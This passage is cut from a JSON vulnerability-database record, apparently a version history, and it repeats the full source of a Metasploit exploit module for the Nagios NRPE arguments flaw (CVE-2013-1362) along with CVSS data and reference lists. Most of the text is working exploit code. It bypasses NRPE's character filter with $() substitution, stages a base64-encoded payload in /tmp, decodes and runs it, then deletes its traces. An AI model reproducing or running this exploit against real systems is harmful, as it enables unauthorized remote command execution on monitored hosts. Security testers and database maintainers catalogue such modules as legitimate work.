"https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires 
Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's 
Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n 
vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-04-09T02:02:52", "differentElements": ["description", "metasploitHistory", 
"metasploitReliability", "references", "sourceHref"], "edition": 91}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "cad24950780e0d03b3337a6d96d82fa7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-05-28T20:33:19", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1", "OPENSUSE-SU-2013:0624-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": 
["FEDORA_2013-9848.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-05-28T20:33:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:33:19", "differentElements": ["cvss"], "edition": 92}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-05-29T14:31:13", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-05-29T14:31:13"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 
'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f 
/tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T14:31:13", "differentElements": 
["sourceData"], "edition": 93}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "7af0909609ddf9c8e970b9a830af05bd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-11T00:33:01", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, 
{"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-05-29T14:31:13"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T00:33:01", "differentElements": ["sourceData"], "edition": 94}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-11T02:33:16", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
